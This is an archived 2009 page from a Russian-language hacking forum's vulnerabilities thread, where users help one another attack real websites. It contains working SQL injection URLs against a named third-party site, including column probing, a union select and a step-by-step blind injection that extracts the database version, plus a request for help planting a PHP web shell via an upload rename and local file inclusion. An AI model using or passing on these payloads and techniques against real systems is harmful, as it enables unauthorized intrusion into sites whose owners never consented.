HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 938 из 2438 « Первая < 438838888928 934 935 936 937 938 939 940 941 942 948988103814381938 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #9371  
Старый 13.10.2009, 20:51
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Цитата:
Сообщение от 2Fed123  
Ctacok
Напиши,буду очень признателен
Не силён в Perl.
Попробуй сам написать.
Если будут вопросы пиши сюда:
https://forum.antichat.ru/
threadedpost1594515.html#post1594515 .

Это если на PHP будешь писать.

А если на Perl:
https://forum.antichat.ru/thread40897.html
 
Ответить с цитированием

  #9372  
Старый 13.10.2009, 22:29
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию
Ctacok жжет ))
2Fed123 цык
разберешся там просто
цэ грабер с хакера
 
Ответить с цитированием

  #9373  
Старый 14.10.2009, 12:10
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию
Помогите раскрутить скулю (добиться вывода)...

узнаем что есть 21 поле
http://www.enext.ua/index.php?node=770+order+by+21--

http://www.enext.ua/index.php?node=-770+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--
вывода нет...
 
Ответить с цитированием

  #9374  
Старый 14.10.2009, 14:14
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Ща набегут и помогут, а пока вот,пробуй сам раскрутить)
Цитата:
http://www.enext.ua/index.php?node=0+and+substring(version(),1,1)=5
 
Ответить с цитированием

  #9375  
Старый 14.10.2009, 16:28
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию
Цитата:
Сообщение от $n@ke  
Ща набегут и помогут, а пока вот,пробуй сам раскрутить)
чет не получается... начал перечитывать статью по символьному перебору https://forum.antichat.ru/showpost.php?p=407227&postcount=3 но понял, что вроде как не в ту сторону копаю...
Может распишешь запрос к выводу, а я по аналогии разберусь с этим примером...
 
Ответить с цитированием

  #9376  
Старый 14.10.2009, 18:05
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию
pelligrim в ту сторону копаеш, только твой вывод это правильно отображение странички (т.е. правильное выполнение запроса), а тут смотри выводим версию бд
Код:
http://www.enext.ua/index.php?node=0+and+substring(version(),1,1)=5 => 1 символ равняеться 5
http://www.enext.ua/index.php?node=0+and+ascii(lower(substring(version(),2,1)))=0x2E => так опряделяем точку
http://www.enext.ua/index.php?node=0+and+substring(version(),3,1)=0 => тут ноль
http://www.enext.ua/index.php?node=0+and+ascii(lower(substring(version(),4,1)))=0x2E
http://www.enext.ua/index.php?node=0+and+substring(version(),5,1)=7  => ну и тут 2 семерки
http://www.enext.ua/index.php?node=0+and+substring(version(),6,1)=7
в итоге получаем версию мускула - 5.0.77
 
Ответить с цитированием

  #9377  
Старый 14.10.2009, 20:43
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию
проблема такая,выполняю sql запрос в пхпадмине,пишет: Запрос выполнен успешно,смотрю файл пустой,пробовал писать произволные символы.Успеха нет.
Пишу в папку tmp ,пишеться,читаю админом файл пустой..Юзер рут
 
Ответить с цитированием

  #9378  
Старый 14.10.2009, 22:29
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Shadrin
Мб на запрос посмотрим, или сами догадаемся?
Уверен, что файл пустой, или всё-же его нет?
 
Ответить с цитированием

  #9379  
Старый 14.10.2009, 22:59
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от Shadrin  
проблема такая,выполняю sql запрос в пхпадмине,пишет: Запрос выполнен успешно,смотрю файл пустой,пробовал писать произволные символы.Успеха нет.
Пишу в папку tmp ,пишеться,читаю админом файл пустой..Юзер рут

пустой - это ты видишь в phpmyadmine, после load_file() результат "NULL"?
 
Ответить с цитированием

  #9380  
Старый 15.10.2009, 11:01
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию
Запрос был вот
нет он писал именно файл с размером 0, в папке на запись был Index Of ,поэтому все было видно, проблема решилось следующим образом,я просто изменил таблицу и базу куда слал запрос,и все записалось)
UpЕсть админка через которую можно заливать пхп код,только переименовывает в жпг,и вижу исходник шелла, и так же есть локальный инклуд,если возможно то как залить шелл?
Последний раз редактировалось Shadrin; 15.10.2009 в 12:18..
 
Ответить с цитированием
Ответ
Страница 938 из 2438 « Первая < 438838888928 934 935 936 937 938 939 940 941 942 948988103814381938 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ